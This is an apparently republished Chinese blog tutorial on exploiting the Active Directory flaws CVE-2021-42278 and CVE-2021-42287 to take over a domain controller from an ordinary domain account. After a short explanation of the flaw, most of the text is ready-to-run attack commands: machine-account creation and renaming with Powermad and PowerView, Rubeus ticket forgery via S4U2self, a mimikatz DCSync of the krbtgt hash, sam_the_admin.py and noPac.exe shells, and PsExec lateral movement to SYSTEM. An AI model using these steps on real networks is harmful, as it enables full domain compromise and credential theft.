前言

網(wǎng)絡(luò)安全技術(shù)學(xué)習(xí)，承認(rèn)??的弱點不是丑事。只有對原理了然于?，才能突破更多的限制。擁有快速學(xué)習(xí)能力的白帽子，是不能有短板的，有的只能是大量的標(biāo)準(zhǔn)板和幾塊長板。知識?，決定看到的攻擊?有多?；知識鏈，決定發(fā)動的殺傷鏈有多深。

一、漏洞原理

• CVE-2021-42278，機(jī)器賬戶的名字一般來說應(yīng)該以$結(jié)尾，但AD沒有對域內(nèi)機(jī)器賬戶名做驗證。
• CVE-2021-42287，與上述漏洞配合使用，創(chuàng)建與DC機(jī)器賬戶名字相同的機(jī)器賬戶（不以$結(jié)尾），賬戶請求一個TGT后，更名賬戶，然后通過S4U2self申請TGS
  Ticket，接著DC在TGS_REP階段，這個賬戶不存在的時候，DC會使用自己的密鑰加密TGS
  Ticket，提供一個屬于該賬戶的PAC，然后我們就得到了一個高權(quán)限ST。
• 假如域內(nèi)有一臺域控名為 DC（域控對應(yīng)的機(jī)器用戶為 DC$），此時攻擊者利用漏洞CVE?2021?42287創(chuàng)建一個機(jī)器用戶SAMTHEADMIN?48$，再把機(jī)器用戶 SAMTHEADMIN-48$ 的 sAMAccountName 改成 DC。然后利用 DC
  去申請一個TGT票據(jù)。再把 DC 的sAMAccountName 改為 SAMTHEADMIN-48$。這個時候KDC就會判斷域內(nèi)沒有DC這個用戶，自動去搜索DC$（DC$是域內(nèi)已經(jīng)的域控DC 的 sAMAccountName），攻擊者利用剛剛申請的 TGT 進(jìn)行
  S4U2self，模擬域內(nèi)的域管去請求域控 DC 的 ST 票據(jù)，最終獲得域控制器DC的權(quán)限。

二、手工復(fù)現(xiàn)

在這給大家分享一套學(xué)習(xí)思路與資料 》點擊查看《 希望能夠幫助大家！

1、操作流程

# 1. create a computer account $password = ConvertTo-SecureString 'ComputerPassword' -AsPlainText -Force New-MachineAccount -MachineAccount "ControlledComputer" -Password $($password) -Domain "domain.local" -DomainController "DomainController.domain.local" -Verbose# 2. clear its SPNs Set-DomainObject "CN=ControlledComputer,CN=Computers,DC=domain,DC=local" -Clear 'serviceprincipalname' -Verbose# 3. rename the computer (computer -> DC) Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "DomainController" -Attribute samaccountname -Verbose# 4. obtain a TGT Rubeus.exe asktgt /user:"DomainController" /password:"ComputerPassword" /domain:"domain.local" /dc:"DomainController.domain.local" /nowrap# 5. reset the computer name Set-MachineAccountAttribute -MachineAccount "ControlledComputer" -Value "ControlledComputer" -Attribute samaccountname -Verbose# 6. obtain a service ticket with S4U2self by presenting the previous TGT Rubeus.exe s4u /self /impersonateuser:"DomainAdmin" /altservice:"ldap/DomainController.domain.local" /dc:"DomainController.domain.local" /ptt /ticket:[Base64 TGT]# 7. DCSync (mimikatz) lsadump::dcsync /domain:domain.local /kdc:DomainController.domain.local /user:krbtgt

2、擁有一個普通域賬戶

net user xxx /domain

3、嘗試攻擊

3.1、利用 powermad.ps1 新增機(jī)器帳號（域用戶默認(rèn)可以新建機(jī)器賬戶）

命令

Import-Module .\Powermad.ps1 New-MachineAccount -MachineAccount TestSPN -Domain xx.xx -DomainController xx.xx.xx -Verbose

3.2、clear its SPNs（清除SPN信息）

Import-Module .\powerview.ps1 Set-DomainObject "CN=TestSPN,CN=Computers,DC=xxx,DC=xxx" -Clear 'serviceprincipalname' -Verbose

3.3、reset the computer name（重設(shè)機(jī)器名稱）

Set-MachineAccountAttribute -MachineAccount TestSPN -Value “xxx” -Attribute samaccountname -Verbose

3.4、Request TGT （請求TGT）

.\Rubeus.exe asktgt /user:xxx /password:x’x’x’x /domain:xxx.xxx /dc:xx.xx.xx /nowrap

3.5、Change Machine Account samaccountname（改回原來屬性）

Set-MachineAccountAttribute -MachineAccount TestSPN -Value “TestSPN” -Attribute samaccountname -Verbose

3.6、Request S4U2self（獲取票據(jù)）

.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:x.x.x /self /altservice:LDAP/x.x.x. /ptt /ticket:doIE5jCCBOKgAwIBBaEDAgEWooID/zCCA/t

3.7、獲取 kbrtgt 用戶的 NTLM Hash

lsadump::dcsync /user:x\krbtgt /domain:x.x /dc:x.x.x

三、sam-the-admin復(fù)現(xiàn)

前置條件：

需要一個域用戶

利用過程：

拿主域控

python3 sam_the_admin.py x.x/x:x -dc-ip x.x.x.x -shell

漏洞利用

漏洞證明

拿子域控

python3 sam_the_admin.py x.x.x/x:x -dc-ip x.x.x.x -shell

漏洞利用

漏洞證明

問題

低版本的kali可能會面臨可以拿到票據(jù)，但是無法列出命令執(zhí)行的窗口

四、impacket工具包復(fù)現(xiàn)

五、CVE-2021-42287/CVE-2021-42278 工具利用

1、下載地址

github

2、實際操作

2.1、掃描探測

.\noPac.exe scan -domain x.x.x -user x -pass 'x'

測試開始之前查看域控根目錄提示拒絕訪問

dir \x.x.x\c$

2.2、直接利用(打子域是同樣方法)

./noPac.exe -domain x.x -user x -pass 'x' /dc x.x.x /mAccount x /mPassword x /service cifs /ptt

此時已可以查看域控根目錄

ls \x.x.x\c$

注意問題

如果使用cifs協(xié)議的話，時間過長之后票據(jù)會失效

如果使用ldap協(xié)議的話，票據(jù)不會失效

2.3、深度利用

使用PsExec橫向移動

通過noPac.exe使用cifs協(xié)議后，可以繼續(xù)通過PsExec64.exe直接橫向移動到域控主機(jī)或者域內(nèi)其他機(jī)器

PsExec64.exe \\x.x.x.x -u x\x -i -p x -s cmd.exe

利用過程

直接提升到system權(quán)限，查看IP確實為域控IP

網(wǎng)絡(luò)安全感悟

做網(wǎng)絡(luò)安全是一個長期的過程，因為做網(wǎng)絡(luò)安全沒有終點，不管是網(wǎng)絡(luò)安全企業(yè)，還是在網(wǎng)絡(luò)安全行業(yè)各種不同方向的從業(yè)人員，不管你選擇哪個方向，只有在這條路上堅持不懈，才能在這條路上走的更遠(yuǎn)，走的更好，不然你肯定走不遠(yuǎn)，遲早會轉(zhuǎn)行或者被淘汰，把時間全浪費掉。如果你覺得自己是真的熱愛網(wǎng)絡(luò)安全這個行業(yè)，堅持走下去就可以了，不用去管別人，現(xiàn)在就是一個大浪淘金的時代，淘下去的是沙子，留下來的才是金子，正所謂，千淘萬漉雖辛苦，吹盡狂沙始到金，網(wǎng)絡(luò)安全的路還很長，一生只做一件事，堅持做好一件事！

總結(jié)

以上是生活随笔為你收集整理的【安全漏洞】CVE-2021-42287CVE-2021-42278 域内提权的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。